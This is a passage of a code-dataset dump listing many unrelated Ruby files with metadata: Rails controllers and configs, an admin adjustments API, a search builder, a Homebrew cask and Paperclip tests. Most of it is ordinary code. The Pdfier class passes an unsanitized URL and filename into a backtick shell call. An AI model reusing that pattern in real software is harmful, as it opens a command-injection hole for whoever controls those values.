hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
21714fd4e71451c38d0d291712efc0edac8fadd0 | 126 | require 'rails_helper'
RSpec.describe Champion, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 21 | 56 | 0.746032 |
61f57195ac745b8f9258a43d4d4905c014c4ddd6 | 719 | require 'sageone_sdk/signature'
require 'active_support'
require "active_support/core_ext"
module SageoneSdk
module Middleware
# Signature
class Signature < Faraday::Middleware
def initialize(app, access_token, signing_secret)
super(app)
@access_token = access_token
@signing_secret = signing_secret
end
# Call
def call(env)
nonce = SageoneSdk::Signature.generate_nonce
signature = SageoneSdk::Signature.new(env.method, env.url, env.body, nonce, @signing_secret, @access_token)
env[:request_headers]['X-Nonce'] = nonce
env[:request_headers]['X-Signature'] = signature.to_s
@app.call(env)
end
end
end
end
| 24.793103 | 115 | 0.670376 |
339c453645f4e820ba6de97ddb87fdf4743cde0d | 107 | require 'billogram'
require 'minitest/autorun'
require 'logger'
class TestBillogram < Minitest::Test
end
| 13.375 | 36 | 0.785047 |
33b92c876176e8056d353145eb7c1ce2be6feb75 | 444 | cask 'fsnotes' do
version '4.0.9'
sha256 '256723f712c68723b0f37cec606c9a0410cfa1d796035a2a2a7dcf6390ac091a'
# github.com/glushchenko/fsnotes was verified as official when first introduced to the cask
url "https://github.com/glushchenko/fsnotes/releases/download/#{version}/FSNotes_#{version}.zip"
appcast 'https://github.com/glushchenko/fsnotes/releases.atom'
name 'FSNotes'
homepage 'https://fsnot.es/'
app 'FSNotes.app'
end
| 34.153846 | 98 | 0.772523 |
87f912397ec19d825c3a8e4d5d8c30a0be1a413c | 2,266 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
# Run rails dev:cache to toggle caching.
if Rails.root.join('tmp', 'caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.action_controller.enable_fragment_cache_logging = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Highlight code that triggered database queries in logs.
config.active_record.verbose_query_logs = true
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations.
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
config.hosts.clear
end
| 34.861538 | 87 | 0.763019 |
bffa6eaa7ad904171f3c624da5a2f8f33199b6b5 | 838 | class SessionsController < ApplicationController
# GET /login
def new
#@session = Session.new
end
# POST /login
def create
user = User.find_by(email: params[:session][:email])
if user && user.authenticate(params[:session][:password])
if user.activated?
# Success
log_in user
params[:session][:remember_me] == '1' ? remember(user) : forget(user)
redirect_back_or user
else
message = "Account not activated. "
message += "Check your email for the activation link."
flash[:warning] = message
redirect_to root_url
end
else
# Failure
flash.now[:danger] = 'Invalid email/password combination'
render 'new'
end
end
# DELETE /logout
def destroy
log_out if logged_in?
redirect_to root_url
end
end | 23.277778 | 77 | 0.625298 |
33ad71fbef06f48943ed03f4f448ee87696e771e | 1,108 | require File.dirname(__FILE__) + '/../spec_helper'
describe CustomProjectsController, "new" do
let(:project) { Project.make! }
it "should not allow access to managers if project isn't trusted" do
expect( project ).not_to be_trusted
pu = ProjectUser.make!( project: project, role: "manager" )
sign_in pu.user
get :new, params: { project_id: project.id }
expect( response ).to be_redirect
end
it "should not allow access to non-managers" do
project.update_attributes( trusted: true )
u = User.make!
sign_in u
get :new, params: { project_id: project.id }
expect( response ).to be_redirect
end
it "should allow access by managers if project trusted" do
project.update_attributes( trusted: true)
pu = ProjectUser.make!( project: project, role: "manager" )
sign_in pu.user
get :new, params: { project_id: project.id }
expect( response ).to be_successful
end
it "should allow access by admins" do
u = make_admin
sign_in u
get :new, params: { project_id: project.id }
expect( response ).to be_successful
end
end
| 30.777778 | 70 | 0.684116 |
1d91beda1077cd301586fa48a352d0fa070720b8 | 7,956 | # encoding: UTF-8
# frozen_string_literal: true
module API
module V2
module Admin
class Adjustments < Grape::API
helpers ::API::V2::Admin::Helpers
namespace :adjustments do
desc 'Get all adjustments, result is paginated.',
is_array: true,
success: API::V2::Admin::Entities::Adjustment
params do
use :currency
use :date_picker
use :pagination
use :ordering
optional :state,
type: String,
values: { value: -> { Adjustment.aasm.states.map(&:name).map(&:to_s) }, message: 'admin.adjustment.invalid_action' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:state][:desc] }
optional :category,
type: String,
values: { value: -> { ::Adjustment::CATEGORIES }, message: 'admin.adjustment.invalid_category' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:category][:desc] }
end
get do
admin_authorize! :read, Adjustment
ransack_params = Helpers::RansackBuilder.new(params)
.eq(:state, :category)
.translate(currency: :currency_id)
.with_daterange
.build
search = Adjustment.ransack(ransack_params)
search.sorts = "#{params[:order_by]} #{params[:ordering]}"
present paginate(search.result), with: API::V2::Admin::Entities::Adjustment
end
desc 'Get adjustment by ID',
success: API::V2::Admin::Entities::Adjustment
params do
requires :id,
type: { value: Integer, message: 'account.adjustment.non_integer_id' },
desc: 'Adjsustment Identifier in Database'
end
get ':id' do
admin_authorize! :read, Adjustment
present ::Adjustment.find(params[:id]), with: API::V2::Admin::Entities::Adjustment
end
desc 'Create new adjustment.',
success: API::V2::Admin::Entities::Adjustment
params do
requires :reason,
type: String,
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:reason][:desc] }
requires :description,
type: String,
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:description][:desc] }
requires :category,
type: String,
values: { value: -> { ::Adjustment::CATEGORIES }, message: 'admin.adjustment.invalid_category' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:category][:desc] }
requires :amount,
type: { value: BigDecimal, message: 'admin.adjustment.non_decimal_amount' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:amount][:desc] }
requires :currency_id,
type: String,
values: { value: -> { ::Currency.codes }, message: 'admin.adjustment.currency_doesnt_exist' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:currency][:desc] }
requires :asset_account_code,
type: { value: Integer, message: 'admin.adjustment.non_integer_asset_account_code' },
values: { value: -> { ::Operations::Account.where(type: :asset).pluck(:code) }, message: 'admin.adjustment.invalid_asset_account_code' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:asset_account_code][:desc] }
requires :receiving_account_code,
type: { value: Integer, message: 'admin.adjustment.non_integer_receiving_account_code' },
values: { value: -> { ::Operations::Account.where.not(type: :asset).pluck(:code) }, message: 'admin.adjustment.invalid_receiving_account_code' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:receiving_account_code][:desc] }
optional :receiving_member_uid,
type: String,
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:receiving_account_code][:desc] }
end
post '/new' do
admin_authorize! :create, Adjustment
# Do not accept member_uid if account code is not Liability or Revenue
# Raise error if there is no :receiving_member_uid for Liability
operation_klass = ::Operations.klass_for(code: params[:receiving_account_code])
if operation_klass == ::Operations::Liability && params[:receiving_member_uid].blank?
error!({ errors: ['admin.adjustment.missing_receiving_member_uid'] }, 422)
elsif operation_klass == ::Operations::Expense && params[:receiving_member_uid].present?
error!({ errors: ['admin.adjustment.redundant_receiving_member_uid'] }, 422)
end
receiving = ::Operations.build_account_number(currency_id: params[:currency_id],
account_code: params[:receiving_account_code],
member_uid: params[:receiving_member_uid])
adjustment = Adjustment.new(declared(params)
.except(:receiving_account_code, :receiving_member_uid)
.merge(receiving_account_number: receiving,
creator: current_user))
if adjustment.save
present adjustment, with: API::V2::Admin::Entities::Adjustment
status 201
else
body errors: adjustment.errors.full_messages
status 422
end
end
desc 'Accepts adjustment and creates operations or reject adjustment.',
success: API::V2::Admin::Entities::Adjustment
params do
requires :id,
type: { value: Integer, message: 'admin.adjustment.non_integer_id' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:id][:desc] }
requires :action,
type: String,
values: { value: -> { Adjustment.aasm.events.map(&:name).map(&:to_s) }, message: 'admin.adjustment.invalid_action' },
desc: "Adjustment action all available actions: #{Adjustment.aasm.events.map(&:name)}"
end
post '/action' do
admin_authorize! :update, Adjustment
adjustment = Adjustment.find(params[:id])
if adjustment.amount < 0
account_number_hash = ::Operations.split_account_number(account_number: adjustment.receiving_account_number)
member = Member.find_by(uid: account_number_hash[:member_uid])
balance = member.get_account(account_number_hash[:currency_id]).balance
if adjustment.amount.abs() > balance
error!({ errors: ['admin.adjustment.user_insufficient_balance'] }, 422)
end
end
if adjustment.public_send("may_#{params[:action]}?")
# TODO: Add behaviour in case of errors on action.
adjustment.public_send("#{params[:action]}!", validator: current_user)
present adjustment, with: API::V2::Admin::Entities::Adjustment
else
body errors: ["admin.adjustment.cannot_perform_#{params[:action]}_action"]
status 422
end
end
end
end
end
end
end
| 51 | 165 | 0.552288 |
f74a50f55874a5e555254c75436f44d697d292fe | 4,104 | # frozen_string_literal: true
class PressSearchBuilder < ::SearchBuilder
self.default_processor_chain += [
:filter_by_press,
:filter_by_product_access,
:show_works_or_works_that_contain_files
]
def filter_by_press(solr_parameters)
solr_parameters[:fq] ||= []
solr_parameters[:fq] << "{!terms f=press_sim}#{all_presses.map(&:downcase).join(',')}"
end
def url_press
@url_press ||= Press.find_by(subdomain: blacklight_params['press'])
end
def all_presses
@all_presses ||= url_press.children.pluck(:subdomain).push(url_press.subdomain).uniq
end
def filter_by_product_access(solr_parameters)
# TODO: Not sure if we should have an admin over ride. Decide if we want this or not.
# return if press_admin_role_override?
# these URL params can be set by radio buttons in the UI "facet looking thing" seen in the wireframes
if blacklight_params['user_access'] == 'true'
solr_parameters[:fq] ||= []
solr_parameters[:fq] << "{!terms f=products_lsim}#{all_product_ids_accessible_by_current_actor.join(',')}"
elsif blacklight_params['user_access'] == 'oa'
solr_parameters[:fq] ||= []
solr_parameters[:fq] << "{!terms f=products_lsim}-1" # equivalent to solr_parameters[:fq] << "+open_access_tesim:yes"
end
end
# show both works that match the query and works that contain files that match the query
# see https://github.com/samvera/hyrax/blob/1477059ba7983bc3e1e3980d107d3ebc1b1f4af4/app/search_builders/hyrax/catalog_search_builder.rb#L10
def show_works_or_works_that_contain_files(solr_parameters)
return if blacklight_params[:q].blank? || blacklight_params['press'] != 'barpublishing'
solr_parameters[:user_query] = blacklight_params[:q]
solr_parameters[:q] = new_query
end
def default_sort_field
# This code is working at the moment (see HELIO-3429).
# default_sort_field is a very ubiquitous term and is defined multiple times in multiple locations
# blacklight_config.default_sort_field appears to morph between being a hash and being a method
# In short this is a hack because I have no idea why it works.
# Feel free to purge this code and find a better solution.
case blacklight_params['press']
when /^barpublishing$/i
if blacklight_params['q'].present?
blacklight_config.default_sort_field
else
blacklight_config.sort_fields['year desc'] # Sort by Publication Date (Newest First)
end
else
blacklight_config.default_sort_field
end
end
private
# the {!lucene} gives us the OR syntax
def new_query
"{!lucene}#{interal_query(dismax_query)} #{interal_query(join_for_works_from_files)}"
end
# the _query_ allows for another parser (aka dismax)
def interal_query(query_value)
"_query_:\"#{query_value}\""
end
# the {!dismax} causes the query to go against the query fields
def dismax_query
"{!dismax v=$user_query}"
end
# join from file id to work relationship solrized file_set_ids_ssim
def join_for_works_from_files
"{!join from=#{ActiveFedora.id_field} to=file_set_ids_ssim}#{dismax_query}"
end
def press_admin_role_override?
return true if current_user&.platform_admin?
admin_roles = Role.where(user: current_user, resource_type: 'Press', resource_id: url_press.id, role: ['admin', 'editor']).map(&:role) & ['admin', 'editor']
admin_roles.present?
end
def all_product_ids_accessible_by_current_actor
# HELIO-3347 Indicate access levels on Publisher page
#
# -1 == Imaginary product ID for Open Access monographs.
# 0 == Default product ID for all non-product Monographs a.k.a. Monographs that are not components.
# allow_read_products == free to read products
# actor_products == current actor's products
#
allow_read_products_ids = Sighrax.allow_read_products.pluck(:id)
actor_products_ids = Sighrax.actor_products(scope.current_actor).pluck(:id)
([-1, 0] + allow_read_products_ids + actor_products_ids).uniq.sort
end
end
| 39.461538 | 162 | 0.716862 |
87cb5cf505c535f5b6c63b585b01491fca510514 | 1,113 | require 'gtk3'
module Overcast
module Gui
class DirectoryDetailsWindow < Gtk::Window
def initialize(window_type, options = {})
@directory_item = options[:directory_item]
parent = options[:parent]
super(window_type)
self.set_title("Directory Details [#{@directory_item.path}]")
self.resizable = false
self.border_width = 0
self.set_default_size(350, 200)
self.set_modal(true)
self.transient_for = parent
self.window_position = Gtk::WindowPosition::CENTER_ON_PARENT # or :center_on_parent
self.signal_connect("destroy") { self.hide }
box = Gtk::Box.new(:vertical, 0)
box.spacing = 6
directory_files_count_label = Gtk::Label.new("# of Files: #{@directory_item.files_count}")
box.pack_start(directory_files_count_label, expand: false, fill: true, padding: 0)
directory_size_label = Gtk::Label.new("Directory Size: #{@directory_item.size}")
box.pack_start(directory_size_label, expand: false, fill: true, padding: 0)
self.add(box)
end
end
end
end | 38.37931 | 99 | 0.660377 |
61b00a0f5023b283714b9e8edf82eff1e52e4475 | 744 | require 'spec_helper'
describe 'cis_hardening::logaudit' do
on_supported_os.each do |os, os_facts|
context "on #{os}" do
let(:facts) { os_facts }
# Check for default class
it {
is_expected.to contain_class('cis_hardening::logaudit')
}
# Check for all includes in the logaudit.pp
it {
is_expected.to contain_class('cis_hardening::logaudit::accounting')
}
it {
is_expected.to contain_class('cis_hardening::logaudit::logging')
}
it {
is_expected.to contain_class('cis_hardening::logaudit::logrotate')
}
# Ensure manifest compiles with all dependencies
it {
is_expected.to compile.with_all_deps
}
end
end
end | 24.8 | 75 | 0.63172 |
1a476ed5e97395e6e92bc6f0d96cd3e5c8974579 | 1,759 | module Pocketsphinx
module API
module Pocketsphinx
extend FFI::Library
ffi_lib "libpocketsphinx"
typedef :pointer, :decoder
typedef :pointer, :configuration
# Allows expect(API::Pocketsphinx).to receive(:ps_init) in JRuby specs
def self.ps_init(*args)
ps_init_private(*args)
end
attach_function :ps_init_private, :ps_init, [:configuration], :decoder
attach_function :ps_reinit, [:decoder, :configuration], :int
attach_function :ps_default_search_args, [:pointer], :void
attach_function :ps_args, [], :pointer
attach_function :ps_decode_raw, [:decoder, :pointer, :long], :int
attach_function :ps_process_raw, [:decoder, :pointer, :size_t, :int, :int], :int
attach_function :ps_start_utt, [:decoder], :int
attach_function :ps_end_utt, [:decoder], :int
attach_function :ps_get_in_speech, [:decoder], :uint8
attach_function :ps_get_hyp, [:decoder, :pointer], :string
attach_function :ps_get_prob, [:decoder], :int32
attach_function :ps_set_jsgf_string, [:decoder, :string, :string], :int
attach_function :ps_unset_search, [:decoder, :string], :int
attach_function :ps_get_search, [:decoder], :string
attach_function :ps_set_search, [:decoder, :string], :int
typedef :pointer, :seg_iter
attach_function :ps_seg_iter, [:decoder, :pointer], :seg_iter
attach_function :ps_seg_next, [:seg_iter], :seg_iter
attach_function :ps_seg_word, [:seg_iter], :string
attach_function :ps_seg_frames, [:seg_iter, :pointer, :pointer], :void
attach_function :ps_seg_prob, [:seg_iter, :pointer, :pointer, :pointer], :int32
attach_function :ps_seg_free, [:seg_iter], :void
end
end
end
| 41.880952 | 86 | 0.688459 |
034c1a75334a8d94d3417e79e1c62c31cfaba285 | 1,111 | require 'sql_helper'
module Bmg
module Sql
class Processor
describe Requalify, "on_inner_join" do
subject{ Requalify.new(Builder.new(2)).apply(expr) }
context 'with a predicate to requalify' do
let(:expr){
sexpr [ :inner_join,
[:table_as, [:table_name, :supplies], [:range_var_name, "t1"]],
[:table_as, [:table_name, :parts], [:range_var_name, "t2"]],
Predicate::Grammar.sexpr([:eq,
[:qualified_identifier, :t1, :pid],
[:qualified_identifier, :t2, :pid]
])
]
}
let(:expected){
sexpr [ :inner_join,
[:table_as, [:table_name, :supplies], [:range_var_name, "t3"]],
[:table_as, [:table_name, :parts], [:range_var_name, "t4"]],
Predicate::Grammar.sexpr([:eq,
[:qualified_identifier, :t3, :pid],
[:qualified_identifier, :t4, :pid]
])
]
}
it{ should eq(expected) }
end
end
end
end
end
| 28.487179 | 77 | 0.488749 |
62ca90478a384fe2d548fb9fbd50934ebc1c3964 | 1,906 | require 'spec_helper'
describe EventLink do
#def valid_params
# {}
#end
describe "Object Attributes" do
before(:each) { @obj = EventLink.new }
specify { @obj.should respond_to(:event_id) }
specify { @obj.should respond_to(:data_link_id) }
end
describe "Associations" do
before(:each) { @obj = EventLink.new }
specify { @obj.should respond_to(:event) }
specify { @obj.should respond_to(:data_link) }
end
describe "store methods" do
describe "#keyval" do
before(:each) { @obj = EventLink.new }
it "handles string values" do
@obj.keyval[:test] = "a"
@obj.save
@obj.keyval[:test].should == "a"
end
it "handles integer values" do
@obj.keyval[:test] = 1
@obj.save
@obj.keyval[:test].should == 1
end
it "handles array values" do
@obj.keyval[:test] = [1,2,3]
@obj.save
@obj.keyval[:test].should == [1,2,3]
end
end
describe ".periods" do
before(:each) { @obj = EventLink.new }
it "works with method labels" do
@obj.periods = [1]
@obj.save
@obj.periods.should include 1
end
it "supports delete" do
@obj.periods = [1,2,3,4]
@obj.periods.delete 3
@obj.save
@obj.periods.should == [1,2,4]
end
it "supports concatenation" do
@obj.periods = [1,2,3,4]
@obj.periods << 5
@obj.save
@obj.periods.should == [1,2,3,4,5]
end
end
end
#describe "Validations" do
#end
#describe "Instance Methods" do
#end
end
# == Schema Information
#
# Table name: event_links
#
# id :integer not null, primary key
# event_id :integer
# data_link_id :integer
# created_at :datetime not null
# updated_at :datetime not null
#
| 22.690476 | 61 | 0.549318 |
01aa4770bad2ffbda79e1264611179559ea02d68 | 256 | class ColorpickerDeveloper < Cask
url 'http://download.panic.com/picker/developercolorpicker.zip'
homepage 'http://download.panic.com/picker/'
version 'latest'
no_checksum
colorpicker 'Developer Color Picker/DeveloperColorPicker.colorPicker'
end
| 32 | 71 | 0.796875 |
01084b5004ac8e3be7b6fb28ca815805b6a02e77 | 2,217 | class ProjectsController < ApplicationController
before_action :set_project, only: [:show, :edit, :update, :destroy]
# GET /projects
# GET /projects.json
def index
@projects = Project.all
end
# GET /projects/1
# GET /projects/1.json
def show
end
# GET /projects/new
def new
@project = Project.new
@project_form = ProjectForm.new(@project)
end
# GET /projects/1/edit
def edit
@project_form = ProjectForm.new(@project)
end
# POST /projects
# POST /projects.json
def create
@project = Project.new
@project_form = ProjectForm.new(@project)
@project_form.submit(project_params)
respond_to do |format|
if @project_form.save
format.html { redirect_to @project_form, notice: 'Project was successfully created.' }
else
format.html { render :new }
end
end
end
# PATCH/PUT /projects/1
# PATCH/PUT /projects/1.json
def update
@project_form = ProjectForm.new(@project)
@project_form.submit(project_params)
respond_to do |format|
if @project_form.save
format.html { redirect_to @project_form, notice: 'Project was successfully updated.' }
else
format.html { render :edit }
end
end
end
# DELETE /projects/1
# DELETE /projects/1.json
def destroy
@project.destroy
respond_to do |format|
format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_project
@project = Project.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def project_params
params.require(:project).permit(:name, :owner_id, tasks_attributes: [ :name, :description, :done, :id, :_destroy,
sub_tasks_attributes: [ :name, :description, :done, :id, :_destroy ] ],
owner_attributes: [ :name, :role, :description, :id, :_destroy ],
contributors_attributes: [ :name, :role, :description, :id, :_destroy ],
project_tags_attributes: [ :tag_id, :id, :_destroy, tag_attributes:
[ :name, :id, :_destroy ] ])
end
end
| 26.082353 | 119 | 0.662156 |
e800d8357c153fd9e5926e1634c6955ff89ad5fa | 811 | class CreateBranchPriorityCharts < ActiveRecord::Migration
def self.up
create_table :branch_priority_charts do |t|
t.integer "branch_id"
t.integer "priority_id"
t.integer "date_year"
t.integer "date_month"
t.integer "date_day"
t.integer "position"
t.integer "up_count"
t.integer "down_count"
t.integer "volume_count"
t.float "change_percent", :default => 0.0
t.integer "change", :default => 0
t.datetime "created_at"
end
add_index :branch_priority_charts, ["date_year", "date_month", "date_day"], :name => "branch_pcharts_date"
add_index :branch_priority_charts, ["priority_id", "branch_id"], :name => "branch_pcharts_id"
end
def self.down
drop_table :branch_priority_charts
end
end
| 30.037037 | 110 | 0.657213 |
ed34c92c701f991ccf54d1aa5fd9035255de5a94 | 277 | class Pdfier
def initialize(url, filename)
@url = url
@filename = filename
end
def save_as_pdf
`wkhtmltopdf #{@url} ./files/#{get_filename}`
get_filename
end
private
def get_filename
return @filename if @filename.match(/\.pdf$/)
"#{@filename}.pdf"
end
end | 15.388889 | 47 | 0.689531 |
5d94090c68723215fe5604a852c9c46cb9b69cc2 | 1,534 | require "set"
module ActiveRecord
module SqlAnalyzer
class BackgroundProcessor
def initialize
@queue = Queue.new
end
def <<(event)
processor_thread
@queue << event
end
private
MUTEX = Mutex.new
def process_queue
event = @queue.pop
event[:calls] = event[:calls].map do |call|
{
caller: SqlAnalyzer.config[:backtrace_filter_proc].call(call[:caller]),
sql: SqlAnalyzer.config[:sql_redactor_complex_proc].call(call[:sql].dup),
duration: call[:duration]
}
end
logger = event.delete(:logger)
logger.filter_event(event)
logger.log(event)
end
def processor_thread
# Avoid grabbing a mutex unless we really need to
return if @thread && @thread.alive?
MUTEX.synchronize do
# Double check to avoid a race condition
return if @thread && @thread.alive?
@thread = Thread.new do
Rails.logger.info "[SQL-Analyzer] Starting background query thread id #{Thread.current.object_id} in pid #{Process.pid}"
begin
loop do
process_queue
end
rescue => ex
Rails.logger.warn "[SQL-Analyzer] Exception in thread #{Thread.current.object_id}: #{ex.class}, #{ex.message}"
Rails.logger.warn "[SQL-Analyzer] #{ex.backtrace.join(", ")}"
end
end
end
end
end
end
end
| 25.566667 | 132 | 0.562581 |
38ed20fb4b77586db4bd427fae0df0a4443fe5ed | 378 | # frozen_string_literal: true
class CreateOrganizations < ActiveRecord::Migration[5.0]
def change
create_table :organizations, id: :uuid do |t|
t.string :name
t.string :api_key
t.string :client_id
t.string :client_secret
t.string :primary_color
t.string :secondary_color
t.string :subdomain
t.timestamps
end
end
end
| 21 | 56 | 0.671958 |
381182b4c737e5d7cea0d801f320f3235bf88a29 | 413 | # Be sure to restart your server when you modify this file.
Library::Application.config.session_store :cookie_store, key: '_library_session'
# Use the database for sessions instead of the cookie-based default,
# which shouldn't be used to store highly confidential information
# (create the session table with "rails generate session_migration")
# Library::Application.config.session_store :active_record_store
| 45.888889 | 80 | 0.811138 |
d51b866a47127733b1328179eeaac76b7529a5c9 | 1,381 | class Mailboxer::Message < Mailboxer::Notification
attr_accessible :attachment if Mailboxer.protected_attributes?
self.table_name = :mailboxer_notifications
belongs_to :conversation, :class_name => "Mailboxer::Conversation", :validate => true, :autosave => true
validates_presence_of :sender
class_attribute :on_deliver_callback
protected :on_deliver_callback
scope :conversation, lambda { |conversation|
where(:conversation_id => conversation.id)
}
mount_uploader :attachment, AttachmentUploader
class << self
#Sets the on deliver callback method.
def on_deliver(callback_method)
self.on_deliver_callback = callback_method
end
end
#Delivers a Message. USE NOT RECOMENDED.
#Use Mailboxer::Models::Message.send_message instead.
def deliver(reply = false, should_clean = true)
self.clean if should_clean
#Receiver receipts
temp_receipts = recipients.map { |r| build_receipt(r, 'inbox') }
#Sender receipt
sender_receipt = build_receipt(sender, 'sentbox', true)
temp_receipts << sender_receipt
if temp_receipts.all?(&:valid?)
temp_receipts.each(&:save!) #Save receipts
Mailboxer::MailDispatcher.new(self, recipients).call
conversation.touch if reply
self.recipients = nil
on_deliver_callback.call(self) if on_deliver_callback
end
sender_receipt
end
end
| 27.62 | 106 | 0.735699 |
6a8e0b1be33d431ef93a435482d1b7bbf1e7f96a | 20,000 | require './test/helper'
class IntegrationTest < Test::Unit::TestCase
context "Many models at once" do
setup do
rebuild_model
@file = File.new(File.join(FIXTURES_DIR, "5k.png"), 'rb')
300.times do |i|
Dummy.create! :avatar => @file
end
end
teardown { @file.close }
should "not exceed the open file limit" do
assert_nothing_raised do
dummies = Dummy.find(:all)
dummies.each { |dummy| dummy.avatar }
end
end
end
context "An attachment" do
setup do
rebuild_model :styles => { :thumb => "50x50#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"), 'rb')
@dummy.avatar = @file
assert @dummy.save
end
teardown { @file.close }
should "create its thumbnails properly" do
assert_match /\b50x50\b/, `identify "#{@dummy.avatar.path(:thumb)}"`
end
context 'reprocessing with unreadable original' do
setup { File.chmod(0000, @dummy.avatar.path) }
should "not raise an error" do
assert_nothing_raised do
silence_stream(STDERR) do
@dummy.avatar.reprocess!
end
end
end
should "return false" do
silence_stream(STDERR) do
assert [email protected]!
end
end
teardown { File.chmod(0644, @dummy.avatar.path) }
end
context "redefining its attachment styles" do
setup do
Dummy.class_eval do
has_attached_file :avatar, :styles => { :thumb => "150x25#", :dynamic => lambda { |a| '50x50#' } }
end
@d2 = Dummy.find(@dummy.id)
@original_timestamp = @d2.avatar_updated_at
@d2.avatar.reprocess!
@d2.save
end
should "create its thumbnails properly" do
assert_match /\b150x25\b/, `identify "#{@dummy.avatar.path(:thumb)}"`
assert_match /\b50x50\b/, `identify "#{@dummy.avatar.path(:dynamic)}"`
end
should "change the timestamp" do
assert_not_equal @original_timestamp, @d2.avatar_updated_at
end
end
end
context "Attachment" do
setup do
@thumb_path = "./test/../public/system/dummies/avatars/000/000/001/thumb/5k.png"
File.delete(@thumb_path) if File.exists?(@thumb_path)
rebuild_model :styles => { :thumb => "50x50#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"), 'rb')
end
teardown { @file.close }
should "not create the thumbnails upon saving when post-processing is disabled" do
@dummy.avatar.post_processing = false
@dummy.avatar = @file
assert @dummy.save
assert !File.exists?(@thumb_path)
end
should "create the thumbnails upon saving when post_processing is enabled" do
@dummy.avatar.post_processing = true
@dummy.avatar = @file
assert @dummy.save
assert File.exists?(@thumb_path)
end
end
context "Attachment with no generated thumbnails" do
setup do
@thumb_small_path = "./test/../public/system/dummies/avatars/000/000/001/thumb_small/5k.png"
@thumb_large_path = "./test/../public/system/dummies/avatars/000/000/001/thumb_large/5k.png"
File.delete(@thumb_small_path) if File.exists?(@thumb_small_path)
File.delete(@thumb_large_path) if File.exists?(@thumb_large_path)
rebuild_model :styles => { :thumb_small => "50x50#", :thumb_large => "60x60#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"), 'rb')
@dummy.avatar.post_processing = false
@dummy.avatar = @file
assert @dummy.save
@dummy.avatar.post_processing = true
end
teardown { @file.close }
should "allow us to create all thumbnails in one go" do
assert !File.exists?(@thumb_small_path)
assert !File.exists?(@thumb_large_path)
@dummy.avatar.reprocess!
assert File.exists?(@thumb_small_path)
assert File.exists?(@thumb_large_path)
end
should "allow us to selectively create each thumbnail" do
assert !File.exists?(@thumb_small_path)
assert !File.exists?(@thumb_large_path)
@dummy.avatar.reprocess! :thumb_small
assert File.exists?(@thumb_small_path)
assert !File.exists?(@thumb_large_path)
@dummy.avatar.reprocess! :thumb_large
assert File.exists?(@thumb_large_path)
end
end
context "A model that modifies its original" do
setup do
rebuild_model :styles => { :original => "2x2#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"), 'rb')
@dummy.avatar = @file
end
should "report the file size of the processed file and not the original" do
assert_not_equal File.size(@file.path), @dummy.avatar.size
end
teardown { @file.close }
end
context "A model with attachments scoped under an id" do
setup do
rebuild_model :styles => { :large => "100x100",
:medium => "50x50" },
:path => ":rails_root/tmp/:id/:attachments/:style.:extension"
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"), 'rb')
@dummy.avatar = @file
end
teardown { @file.close }
context "when saved" do
setup do
@dummy.save
@saved_path = @dummy.avatar.path(:large)
end
should "have a large file in the right place" do
assert File.exists?(@dummy.avatar.path(:large))
end
context "and deleted" do
setup do
@dummy.avatar.clear
@dummy.save
end
should "not have a large file in the right place anymore" do
assert ! File.exists?(@saved_path)
end
should "not have its next two parent directories" do
assert ! File.exists?(File.dirname(@saved_path))
assert ! File.exists?(File.dirname(File.dirname(@saved_path)))
end
before_should "not die if an unexpected SystemCallError happens" do
FileUtils.stubs(:rmdir).raises(Errno::EPIPE)
end
end
end
end
context "A model with no convert_options setting" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
end
should "have its definition return nil when asked about convert_options" do
assert ! Dummy.attachment_definitions[:avatar][:convert_options]
end
context "redefined to have convert_options setting" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:convert_options => "-strip -depth 8",
